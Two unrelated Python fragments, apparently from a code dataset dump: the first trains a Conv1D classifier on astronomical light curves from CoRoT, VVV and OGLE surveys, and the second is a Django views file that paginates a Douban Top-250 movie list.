    columns); `columns` gives the (time, mag, err) indices and `n` caps
    the number of points returned.

    Same random augmentation as the other readers: stride 1-2 plus a
    random prefix drop of up to `num` points. Returns
    (time, magnitude, error).
    """
    df = pd.read_csv(path, comment='#', sep='\s+', header=None)
    df.columns = ['a','b','c']
    df = df[df.a > 0]
    df = df.sort_values(by=[df.columns[columns[0]]])
    # Erase duplicates if it exist
    # NOTE(review): drop_duplicates returns a new frame; this call's
    # result is discarded, so duplicates are NOT actually removed.
    df.drop_duplicates(subset='a', keep='first')
    # 3 Desviaciones Standard
    #df = df[np.abs(df.mjd-df.mjd.mean())<=(3*df.mjd.std())]
    time = np.array(df[df.columns[columns[0]]].values, dtype=float)
    magnitude = np.array(df[df.columns[columns[1]]].values, dtype=float)
    error = np.array(df[df.columns[columns[2]]].values, dtype=float)
    # Not Nan: keep rows where both time and magnitude are finite numbers.
    not_nan = np.where(~np.logical_or(np.isnan(time), np.isnan(magnitude)))[0]
    time = time[not_nan]
    magnitude = magnitude[not_nan]
    error = error[not_nan]
    # Num: random stride + random prefix drop (shadows the module-level
    # `step` constant).
    step = random.randint(1, 2)
    count = random.randint(0, num)
    time = time[::step]
    magnitude = magnitude[::step]
    error = error[::step]
    time = time[count:]
    magnitude = magnitude[count:]
    error = error[count:]
    # Cap the series at n points.
    if len(time) > n:
        time = time[:n]
        magnitude = magnitude[:n]
        error = error[:n]
    # Get Name of Class
    # folder_path = os.path.dirname(os.path.dirname(os.path.dirname(path)))
    # path, folder_name = os.path.split(folder_path)
    return time, magnitude, error
# Data has the form (Points, (Delta Time, Mag, Error)) 1D
def create_matrix(data, N):
    """Turn a 1-D series into an (N, 1) float column of consecutive
    differences, zero-padded or truncated to length N (element 0 is 0)."""
    diffs = np.append([0], np.diff(data).flatten())
    shortfall = N - len(diffs)
    # Pad with zeros when the series is shorter than N.
    if shortfall > 0:
        diffs = np.append(diffs, [0] * shortfall)
    return np.array(diffs[:N], dtype='float').reshape(-1, 1)
def dataset(files, N):
    """Load every [path, num] pair into model inputs.

    Returns four aligned arrays: time-delta matrices, magnitude-delta
    matrices (both (N, 1) per sample via create_matrix), subclass labels,
    and survey names. Files with unknown subclass are reported and
    skipped.

    NOTE(review): if a path matches none of Corot/VVV/OGLE, t and m stay
    None and create_matrix will fail -- verify inputs always carry a
    survey marker.
    """
    input_1 = []
    input_2 = []
    yClassTrain = []
    survey = []
    for file, num in tqdm(files):
        num = int(num)
        t, m, e, c, s = None, None, None, get_name(file), get_survey(file)
        if c in subclasses:
            if 'Corot' in file:
                # EN2_STAR_CHR products use a different column layout.
                if 'EN2_STAR_CHR' in file:
                    t, m, e = open_corot(file, num, N, [0,4,8])
                else:
                    t, m, e = open_corot(file, num, N, [0,1,2])
            elif 'VVV' in file:
                t, m, e = open_vista(file, num)
            elif 'OGLE' in file:
                t, m, e = open_ogle(file, num, N, [0,1,2])
            # NOTE(review): `c` was already checked above, so this inner
            # check can never take the else branch.
            if c in subclasses:
                input_1.append(create_matrix(t, N))
                input_2.append(create_matrix(m, N))
                yClassTrain.append(c)
                survey.append(s)
            else:
                print('\t [!] E2 No paso el archivo: ', file, '\n\t\t - Clase: ', c)
        else:
            print('\t [!] E1 No paso el archivo: ', file, '\n\t\t - Clase: ', c)
    return np.array(input_1), np.array(input_2), np.array(yClassTrain), np.array(survey)
## Keras Model
def get_model(N, classes, activation='relu'):
    """Build the two-tower Conv1D classifier.

    Time and magnitude towers share the same two Conv1D layers (weights
    reused on both inputs), are concatenated, flattened and passed through
    a dropout/dense head ending in a softmax over `classes`. `N` is the
    per-sample sequence length; hyperparameters (filters, kernel sizes,
    dropout, hidden_dims) come from the module-level settings.
    """
    conv1 = Conv1D(filters, kernel_size, activation='relu')
    conv2 = Conv1D(filters2, kernel_size2, activation='relu')
    # For Time Tower
    input1 = Input((N, 1))
    out1 = conv1(input1)
    out1 = conv2(out1)
    # For Magnitude Tower (same conv layers: shared weights)
    input2 = Input((N, 1))
    out2 = conv1(input2)
    out2 = conv2(out2)
    out = Concatenate()([out1, out2])
    out = Flatten()(out)
    out = Dropout(dropout)(out)
    out = Dense(hidden_dims, activation=activation)(out)
    out = Dropout(dropout)(out)
    out = Dense(len(classes), activation='softmax')(out)
    model = Model([input1, input2], out)
    return model
def class_to_vector(Y, classes):
    """One-hot encode labels `Y` against the ordered list `classes`;
    returns an int array of shape (len(Y), len(classes))."""
    encoded = [[1 if candidate == label else 0 for candidate in classes]
               for label in Y]
    return np.array(encoded)
def serialize_model(name, model):
    """Persist `model` as <name>.json (architecture) plus <name>.h5
    (weights)."""
    # Serialize model to JSON
    with open(name + '.json', "w") as json_file:
        json_file.write(model.to_json())
    # Serialize weights to HDF5
    model.save_weights(name + ".h5")
def experiment(directory, files, Y, classes, N, n_splits):
    """Run a stratified K-fold training experiment and save the results.

    For each (early-stopping, activation) configuration, trains the
    two-tower model on every fold, accumulates out-of-fold predictions,
    serializes each fold's model, and finally stores [yReal, yPred, sReal]
    as a .npy file under the experiment's output folder.

    :param directory: base folder for the experiment outputs
    :param files: array of (filename, index) pairs
    :param Y: class label per file (used for stratification)
    :param classes: ordered class labels (one-hot / softmax order)
    :param N: number of points per light curve
    :param n_splits: number of stratified folds

    NOTE(review): relies on module-level globals (num_gpu, batch_size,
    epochs, validation_set, dropout, ...) — presumably defined earlier in
    the script; verify before reuse.
    """
    # Configurations to iterate over (currently a single value each).
    activations = ['tanh']
    earlyStopping = [False]
    # NOTE(review): the name `earlyStopping` (this list) is rebound to an
    # EarlyStopping callback inside the fold loop below; harmless while the
    # list has one element, but a shadowing hazard if more are added.
    for early in earlyStopping:
        for activation in activations:
            # try:
            print('\t\t [+] Entrenando',
                  '\n\t\t\t [!] Early Stopping', early,
                  '\n\t\t\t [!] Activation', activation)
            direc, name = get_filename(directory, N,
                                       early, activation)
            filename_exp = direc + name
            # Accumulators for out-of-fold predictions / ground truth / survey.
            yPred = np.array([])
            yReal = np.array([])
            sReal = np.array([])
            modelNum = 0
            skf = StratifiedKFold(n_splits=n_splits)
            for train_index, test_index in skf.split(files, Y):
                dTrain, dTest = files[train_index], files[test_index]
                yTrain = Y[train_index]
                ##############
                ### Get DB ###
                ##############
                # Replicate training files (balancing by survey).
                dTrain = replicate_by_survey(dTrain, yTrain)
                # Load the light curves into network-ready matrices.
                dTrain_1, dTrain_2, yTrain, _ = dataset(dTrain, N)
                dTest_1, dTest_2, yTest, sTest = dataset(dTest, N)
                yReal = np.append(yReal, yTest)
                sReal = np.append(sReal, sTest)
                # One-hot encode labels for the softmax output.
                yTrain = class_to_vector(yTrain, classes)
                yTest = class_to_vector(yTest, classes)
                ################
                ## Tensorboard #
                ################
                tensorboard = TensorBoard(log_dir= direc + 'logs',
                                          write_graph=True, write_images=False)
                ################
                ##    Model   ##
                ################
                callbacks = [tensorboard]
                if early:
                    # NOTE(review): rebinds `earlyStopping` (see note above).
                    earlyStopping = EarlyStopping(monitor='val_loss', patience=3,
                                                  verbose=0, mode='auto')
                    callbacks.append(earlyStopping)
                if num_gpu <= 1:
                    print("[!] Training with 1 GPU")
                    model = get_model(N, classes, activation)
                else:
                    print("[!] Training with", str(num_gpu), "GPUs")
                    # We'll store a copy of the model on *every* GPU and then combine
                    # the results from the gradient updates on the CPU
                    with tf.device("/cpu:0"):
                        model = get_model(N, classes, activation)
                    # Make the model parallel
                    model = multi_gpu_model(model, gpus=num_gpu)
                model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
                model.fit([dTrain_1, dTrain_2], yTrain,
                          batch_size=batch_size * num_gpu, epochs=epochs,
                          validation_split=validation_set, verbose=1,
                          callbacks=callbacks)
                # Out-of-fold predictions as indices into `classes`.
                yPred = np.append(yPred, np.argmax(model.predict([dTest_1, dTest_2]), axis=1))
                #################
                ##  Serialize  ##
                #################
                modelDirectory = direc + 'model/'
                if not os.path.exists(modelDirectory):
                    print('[+] Creando Directorio \n\t ->', modelDirectory)
                    os.mkdir(modelDirectory)
                serialize_model(modelDirectory + str(modelNum), model)
                modelNum += 1
                # Free fold data before the next iteration.
                del dTrain, dTest, yTrain, yTest, model
                # break
            # Map predicted indices back to class labels.
            yPred = np.array([classes[int(i)] for i in yPred])
            # Save Matrix
            print('\n \t\t\t [+] Saving Results in', filename_exp)
            np.save(filename_exp, [yReal, yPred, sReal])
            print('*'*30)
            # except Exception as e:
            #     print('\t\t\t [!] Fatal Error:\n\t\t', str(e))
# Script entry: run the experiment for increasing light-curve lengths.
print('[+] Obteniendo Filenames')
files = np.array(get_files(extraRandom, permutation))
# Label every file with its class+survey name; the numeric index in each
# (filename, index) pair is not needed here. (Idiom: append loop ->
# comprehension.)
YSubClass = np.array([get_name_with_survey(file) for file, _ in files])
NUMBER_OF_POINTS = 500
while NUMBER_OF_POINTS <= MAX_NUMBER_OF_POINTS:
    # Create the shared results folder on first use.
    directory = './Resultados' + NombreCarpeta
    if not os.path.exists(directory):
        print('[+] Creando Directorio \n\t ->', directory)
        os.mkdir(directory)
    experiment(directory, files, YSubClass, subclasses, NUMBER_OF_POINTS, n_splits)
    NUMBER_OF_POINTS += step
|
from django.shortcuts import render,render_to_response
from django.http import HttpResponse
from . import models
# Create your views here.
def render404(request):
    """Custom 404 handler: returns a bare "404" body."""
    response = HttpResponse("404")
    return response
def render500(request):
    """Custom 500 handler: returns a bare "500" body."""
    response = HttpResponse("500")
    return response
def index(request):
    """Paginated list view of the Top-250 movies, 25 per page.

    Reads the 1-based page number from the ``page`` query parameter
    (defaults to 1) and renders the matching 25-item slice.

    NOTE(review): a non-numeric ``page`` raises ValueError (500), same as
    before this change — confirm whether input validation is wanted.
    """
    moives = models.douban_top250.objects.all()
    # Idiom: `is None` instead of `== None`; the original's two render
    # branches were duplicates (page 1 slices [0:25] == [:25]), so they
    # collapse into a single path.
    page = request.GET.get('page')
    page = 1 if page is None else int(page)
    start = (page - 1) * 25
    return render(request, 'html/index.html',
                  {'moives': moives[start:start + 25], 'page': page})
def moive_info(request, movie_id):
    """Detail page for a single movie, looked up by primary key."""
    selected = models.douban_top250.objects.get(pk=movie_id)
    return render(request, 'html/moive.html', {'moive': selected})
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.